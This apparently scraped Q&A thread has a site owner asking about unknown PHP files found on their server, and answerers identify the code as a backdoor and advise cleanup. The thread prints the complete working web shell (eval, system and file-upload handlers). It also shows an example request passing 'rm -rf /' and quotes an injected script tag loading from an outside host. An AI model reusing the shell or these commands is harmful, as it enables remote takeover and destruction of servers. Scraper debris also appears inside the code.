What's the purpose of this PHP code/hack.?

开发者 https://www.devze.com 2023-01-05 21:37 出处：网络

I recently found 4 bizarre files on my server (that I didn\'t upload). The filename were like this: goog1e7a20543b128921.php

I recently found 4 bizarre files on my server (that I didn't upload). The filename were like this: goog1e7a20543b128921.php

And here's the code that was inside them:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=开发者_如何学编程''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

Do you have any idea what this code is supposed to do..? Should I start to panic..?

Thanks.

Yep, this is malicious code. This shell script will allow to execute code as well as upload any file is the attacker knows the parameters passed to it. I recommend searching all files for that code, verify file permission and change your passwords just in case.

Suggestion to deal with the attack

I would suggest you to use the HTML Purifier or OWASP to make things a lot secure.

You must disable the eval construct if you are not using that (and you shouldn't unless you really need to).

Analyze the server settings for any security holes with:

PHPSecInfo

What's the purpose of this PHP code/hack.?

_{(source: phpsec.org)}

Delete them right NOW!

It's a backdoor into your webserver.
It allows attackers to send a request to http://you.com/goog1e7a20543b128921.php?s=rm -rf / to delete your entire system.

You should then conduct a thorough security review of your site to figure out how they got there in the first place.

For reference:

if($e){eval($e);}

This allows the attacker to execute any PHP command they want.

if($s){system($s);}

This allows the attacker to execute any system command they want, as whatever user your webserver runs as.

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

This allows the attacker to upload any file they want - again the user your webserver runs as determines file permissions.

In summary, panic :-p

I'm sure there are lots of articles online on how to deal with this. In brief, back up your system for analysis later, reinstall server from scratch (You don't know what else they have done to you so just deleting the files isn't good enough.) while trying to work out how they got in and plugging the hole.

eval($e) - remote execute command system - eq. for listind directory $_FILES['f']['name'] - for uploand script to server eq hack tools etc

apparently you are not the only one with these. googled it real quick, other sites seem infected as well. it looks like all the time the infected file stores itself in the images folder.

Related: Try installing phpAntiVirus for the future, and ask your provider for mod_security. This might mitigate future hacks. Those files didn't materialize all by itself on your server anyway. Get rid of all older PHP applications.

Look for this in each file. <script src="http://nt02.co.in/3"></script> If you find one using your ftp, look at the date the file was modified and open all the files modified on that date and remove it.